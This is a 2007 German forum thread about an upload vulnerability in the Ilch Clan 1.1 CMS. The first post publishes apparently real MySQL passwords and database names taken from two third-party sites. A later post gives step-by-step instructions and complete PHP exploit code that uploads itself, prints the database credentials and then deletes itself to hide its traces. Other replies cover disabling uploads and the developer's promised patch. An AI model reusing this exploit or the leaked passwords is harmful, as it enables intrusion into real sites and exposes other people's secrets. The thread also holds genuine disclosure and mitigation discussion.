ich habe eine schwerwiegende Sicherheitslücke im Ilchscript entdeckt die es Angreifer ermöglicht zugriff auf die gesamte MySQL datenbank zu ermöglichen. Als beweis möchte ich einige Daten veröffentlichen.
<center>
von:
odd-clan.penguinfriends.org/
MySQL Daten:
host: *zensiert*
username: *zensiert*
passwort: lkMsL8dmS
Datenbank: odd-clan
präfix: ic1_
von:
[url]
externer Link[/url]
MySQL Daten:
host: *zensiert*
username: *zensiert*
passwort: yogafine112
Datenbank: usr_web88_1
präfix: ic1_
</center>
ich habe die Usernamen zensiert um die Pages vor angreifern zu schützen. Wer es immer noch nicht glaubt oll bitte die URL seiner Page hier posten und mir 2 minuten geben um sein PW etc hier zu posten
MfG Neo
betroffene Homepage: alle!
Beitrag zur Merkliste hinzufügen
Hier kann eine Notiz zum Merk-Eintrag hinzugefügt werden (optional)
ilch Forum » Ilch Clan 1.1 » Kritik und Verbesserungen » script total unsicher
| Geschlossen | ||
-
So. 21.01.2007
00:17 Uhr
#1
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
-
So. 21.01.2007
00:34 Uhr
#2
- Registriert seit
- 18.05.2004
- Beiträge
- 15.492
- Beitragswertungen
-
So. 21.01.2007
00:40 Uhr
#3
- Registriert seit
- 03.06.2004
- Beiträge
- 3.282
- Beitragswertungen
jup ist mir auch schon aufgefallen, das man sehr leicht andiese "Daten" rankommt. geht irgendwie mit nem php source viewer , der macht halt die datei aus und da dort die sachen klartext drin stehen, naja ist halt bloed.
ist aber nicht wirklich ein sicherheitsbug sondern ein Punkt, der in sachen sicherheit schnellstens verbessert werden sollte, indem man ja kp die daten irgendwie verschlüsseltMeine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
MFG Rock@wulf -
So. 21.01.2007
00:50 Uhr
#4
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
man brauch die daten nich verschlüsseln sondern nur die sicherheitslücke schließen. Verschlüsselungen nnützen gar nischt wenn man an die verschlüsselungen rannkommt und den Key weis womit die datei verschlüsselt wurde...außerdem is das verschlüsseln viel zu aufwendig und unnötig für so ein kleines script -
So. 21.01.2007
00:51 Uhr
#5
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
@SLJ hast du meine PN erhalten? -
Meine Frage, liegts am Script selbst, oder an einer PHP Sicherheitslücke, die du mit irgendeinem Programm/Website ausnutzt?Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
-
So. 21.01.2007
14:38 Uhr
#7
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
ne es ist ein Fehler in der Programmierung -
So. 21.01.2007
15:03 Uhr
#8
- Registriert seit
- 03.06.2004
- Beiträge
- 3.282
- Beitragswertungen
dann weißt du sicherlich auch wie man ihn behebt?
wenn ja lass mal hörenMeine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
MFG Rock@wulf -
So. 21.01.2007
16:41 Uhr
#9
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
rein theoretisch müsste der Fehler auch auf der Page sein glaube ich allerdings is die architektur hier etwas anders -.- -
So. 21.01.2007
19:47 Uhr
#10
- Registriert seit
- 11.04.2006
- Beiträge
- 1.027
- Beitragswertungen
white-hat ich finde es Nett das du das hier postest.
Andere würden sich damit ein spaß machen und die mysql daten zerstören!
Zuletzt modifiziert von Oldemuche am 21.01.2007 - 19:47:30 -
So. 21.01.2007
20:22 Uhr
#11
- Registriert seit
- 27.12.2005
- Beiträge
- 2.354
- Beitragswertungen
Ach du kacke...
Recht hat er!
Nach stundemlangen googlen bin ich drauf gestoßen!
Gibt extra ein Videotutorial dafür
Das werde ich hier natürlich nicht veröffentlichen, ansonsten wären morgen keine ilch pages mehr da!
Am besten schützt man sich wohl, wenn man die user uploads ausstellt!
Per PM gibts mehr infos! Aber nur an vertrauenswürdige!
Zuletzt modifiziert von DaStIaC am 21.01.2007 - 20:35:37 -
So. 21.01.2007
21:41 Uhr
#12
- Registriert seit
- 14.01.2006
- Beiträge
- 2.113
- Beitragswertungen
also wenn es mit nem php source viewer funktionieren soll, dann wäre ja fast alle scipte betroffen, denn viele haben ein config.php wo die mysql daten drinn stehen.
wundert mich auch das dieser punkt keinem in den ganzen vorigen versionen aufgefallen ist.
DaStIaC ich hätte interre, schicke mir mal ne pm mit link zum videoDiscite moniti!
www.pixelbash.de -
So. 21.01.2007
22:03 Uhr
#13
- Registriert seit
- 03.06.2004
- Beiträge
- 3.282
- Beitragswertungen
ja das mit dem source viewer is was komplizierter als das was hier angestellt worden ist...
und ob das mit dem source viewer noch geht ist fraglich das lezte mal wars 1.03 als ich von gelesen habeMeine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
MFG Rock@wulf -
So. 21.01.2007
22:24 Uhr
#14
- Registriert seit
- 16.06.2006
- Beiträge
- 15.334
- Beitragswertungen
Mich würde es auch interessieren, falls du mich also als vertrauenswürdig erachtest
Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite -
So. 21.01.2007
22:26 Uhr
#15
- Registriert seit
- 12.11.2005
- Beiträge
- 987
- Beitragswertungen
es ist ein source viewer! wie man den aber hochbekommt ist mir unklar, aussert man hat ein paar upload funktionen von dem Ilch stantart CMS modifiziert!
@white-hat
mach bitte die php dateien unschädlich, bevor du den link veröffentlichst!!!
Mfg Nero
Zuletzt modifiziert von Nero am 21.01.2007 - 22:30:50ilch-Portal coming soon
-
So. 21.01.2007
22:34 Uhr
#16
- Registriert seit
- 18.05.2004
- Beiträge
- 15.492
- Beitragswertungen
Ja also bei 1.0.5 ist es wohl nicht möglich an die mysql daten ran zu kommen,... wundert mich warum das bei 1.1 dann geht das baut auch darauf auf ! -
So. 21.01.2007
22:44 Uhr
#17
- Registriert seit
- 22.03.2003
- Beiträge
- 4.260
- Beitragswertungen
ne es geht in jedem standard ilchClan 11 skript.
es ist ein fehler von mir im skript, der erst in 1.1 rein gekommen ist.
ich habe gerade ein update in die test phase geschickt was das problem behebt.
ich werde das update morgen veröffentlichen.
bis morgen sollte man die upload funktion kurz ausschalten. -
So. 21.01.2007
23:09 Uhr
#18
- Registriert seit
- 05.05.2006
- Beiträge
- 348
- Beitragswertungen
reicht es heute, den upload mit has_right (-3) ab Member verfügbar zu machen?
Gruss Breiti -
So. 21.01.2007
23:14 Uhr
#19
- Registriert seit
- 26.11.2006
- Beiträge
- 175
- Beitragswertungen
des kommt halt drauf an wie du deinen membern vertraust
aber wie sCoRpIoN sagt ist doch kein prob den mal für ein tag off zu haben
Zuletzt modifiziert von timosy am 21.01.2007 - 23:26:14 -
So. 21.01.2007
23:17 Uhr
#20
- Registriert seit
- 03.03.2005
- Beiträge
- 1.883
- Beitragswertungen
deaktviere den upload doch einfach bis morgen;
mfg
scorp -
So. 21.01.2007
23:34 Uhr
#21
- Registriert seit
- 21.01.2007
- Beiträge
- 2
- Beitragswertungen
Hallöchen
Auf unserer Seite www.opafun.de ist folgender Text aufeinmal....
BITTE externer Link DIESE DATEI LÖSCHEN! und die USER-UPLOADS VORÜBERGEHEND AUSSCHALTEN!
Dieses Habe ich gelöscht und alles ersteinmal gesperrt! Doch wie bekomm ich diesen Text nun weg da dieser die komplette Seite verzieht zumindestens im IE
!
Kann mir jemand helfen??!!
P.S. Danke für die benachrichtigung!
Liebe Grüße [OPA]Tzaphkiel -
So. 21.01.2007
23:48 Uhr
#22
- Registriert seit
- 21.01.2007
- Beiträge
- 2
- Beitragswertungen
Ok hat sich erledigt! Habs selber gefunden und konnte es löschen
Danke für die Warnung! Was sollte ich denn nun als nächstes tun?
Passwörter und so weiter wieder ändern?!
Wär cool wenn ihr mir weiterhelfen könnt!
Liebe Grüße [OPA]Tzaphkiel -
Mo. 22.01.2007
00:16 Uhr
#23
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
also der Fehler liegt bei den Useruplloads
hier ne Anleitung:
also der Fehler liegt in der Programmierung...ich kann als registrierter User Dateien auf den Server laden unter Downloads nach dem hochladen muss ein Mod oder Admin sie zwar aktivieren aber es reicht ja das sie auf dem Server drauf sind....
1. registrieren
2. Downloadpage aufrufen
3. php-datei mit folgendem Inhalt hochladen(name ist hier "xploit.php"):
<?php //ilchscript-hack by neo aka white-hat include("../../../includes/config.php"); echo "<center>"; echo "<br><br><br>MySQL Daten: <br><br>"; echo "host: "; echo DBHOST; echo "<br>"; echo "username: "; echo DBUSER; echo "<br>"; echo "passwort: "; echo DBPASS; echo "<br>"; echo "Datenbank: "; echo DBDATE; echo "<br>"; echo "präfix: "; echo DBPREF; echo "<br><br><br>"; echo "</center>"; unlink("xploit.php"); if(is_file("xploit.php")){ echo "<br><br><center>Datei wurde nicht gelöscht !!!"; }else{ echo "<br><br><center>Datei wurde gelöscht - Spuren wurden verwischt"; } echo "<br><br><strong>Scripted by Neo</stron></center>"; ?>
4.Datei wurde hochgeladen -> Fehlermeldung erscheint manchmal das die Dateiendung nicht hinhaut -> Datei wurde aber trotzdem geuppt
5. URL aufrufen:
www.victim.de/include/downs/downloads/user_upload/xploit.php
6. Script gibt alle MySQL Daten aus und löscht sich selbst
ist eigentlich recht billig
Also bitte einfach die Dateiendungen die NICHT zugelassen sind einfach nicht uploaden lassen !!! Wenn ihr noch Coder braucht oder Security Tester sagt bescheid
Zuletzt modifiziert von white-hat am 22.01.2007 - 00:19:31 -
Mo. 22.01.2007
00:26 Uhr
#24
- Registriert seit
- 12.11.2005
- Beiträge
- 987
- Beitragswertungen
ich frag mich nur gad, bei welchem dieser typen die php datei akzeptiert wird:
$type == 'application/zip' OR $type == 'application/rar' OR $type == 'application/x-rar-compressed' OR $type == 'application/x-zip-compressed' OR $type == 'application/x-rar' OR $type == 'application/x-zip' OR $type == 'application/octet-stream'
Mfg Neroilch-Portal coming soon
-
Mo. 22.01.2007
02:06 Uhr
#25
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
das kmische is ja das die php datei upgeloadet wird manchmal aber angezeigt wird das der dateityp nicht korrekt ist --> Die datei is dennoch hochgeladen ? muss mir das script mal genauer anschauen woran das liegt hab keine zeit mehr muss heute zur schule -.- -
Mo. 22.01.2007
02:07 Uhr
#26
- Registriert seit
- 15.01.2007
- Beiträge
- 24
- Beitragswertungen
@ Oldemuche
wer sagt denn das ich noch net meinen spass hatte ^^
Das SICHERSTER für alle ilchscript-benutzer wäre erstmal den MemberUpload zu deaktivieren wenn das geht
Zuletzt modifiziert von white-hat am 22.01.2007 - 12:20:58 -
Mo. 22.01.2007
18:01 Uhr
#27
- Registriert seit
- 18.05.2004
- Beiträge
- 15.492
- Beitragswertungen
Also wenn ich Ehrlich bin !! Hab wir vor nichtmal 1 Woche über dieses Probleme schon "Intern" geredet,...
Aber egal,... du warst der erste user der uns drauf aufmerksam gemacht hat!
Also auf meinem htttp://slj.sl.funpic.de da ist 1.0.5 drauf dort gibst den fehler wie manuel sagte nicht !
Warum du dennoch mein pw gefunden hast war mein fehler,... und kein Bug im Script !
Und in 1.0.4 (Bei mir zumindest) gibst den fehler auch nicht,... ich habe es extra nochmals überprüft,...
mfg
SLJ -
Mo. 22.01.2007
19:17 Uhr
#28
- Registriert seit
- 03.06.2004
- Beiträge
- 3.282
- Beitragswertungen
dafür kann man in 1.04 -1.05 ganz leicht die daten des users zu knacken gibts auch ein exploitMeine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
MFG Rock@wulf -
Na da gehts ja, dass ich die Uploadfunktion von Anfang an deaktiviert hatte.
Aber mal ne Frage, falls jemand bereits alles ausgelesen hat und von allen Usern z.B. Kenntwörter ändert.
Dann kann sich keiner mehr anmelden. Auch keine Admins.
Wie kommt man dann eigentlich noch zu den Adminrechten?
Gibts denn da ne Möglichkeit? Nicht das ich das jetzt alles wissen will, mich interessiert nur, obs im Notfall geht.
Mfg
@Wega -
Mo. 22.01.2007
19:43 Uhr
#30
- Registriert seit
- 18.05.2004
- Beiträge
- 15.492
- Beitragswertungen
die frage ist halt was man davon hat ? auser das ich kurz nen backup von letzer nacht aufspiele,... bzw. du meinst an den md5 code zu kommen ? fals ja da gibs ne möglichkeit den zusätzlich zu verschlüsseln so das man das nicht knacken kann,...
| Geschlossen | ||
 |
Zurück zu Kritik und Verbesserungen | |
Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten